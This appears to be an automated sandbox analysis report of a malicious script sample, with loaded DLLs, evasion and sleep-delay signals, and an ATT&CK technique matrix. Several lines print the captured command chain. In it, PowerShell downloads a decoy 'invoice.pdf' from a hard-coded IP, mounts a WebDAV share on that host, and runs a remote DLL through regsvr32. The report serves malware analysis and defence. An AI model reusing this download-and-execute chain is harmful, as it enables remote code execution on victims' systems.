    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.Run("cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.", "0", "false")
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeCOM call: HKEY_CURRENT_USER\Control Panel\International\LocaleJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4341Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5265Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 4341 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 5265 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -9223372036854770s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\net.exe TID: 7760Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 7968Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: net.exe, 00000006.00000002.1755562092.0000028369B49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2999079410.000001E97945A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: net.exe, 00000006.00000002.1755505171.0000028369AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2997852046.000001E97402B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    22
    Scripting
    11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local System1
    Data Obfuscation
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    131
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook1
    Obfuscated Files or Information
    NTDS131
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
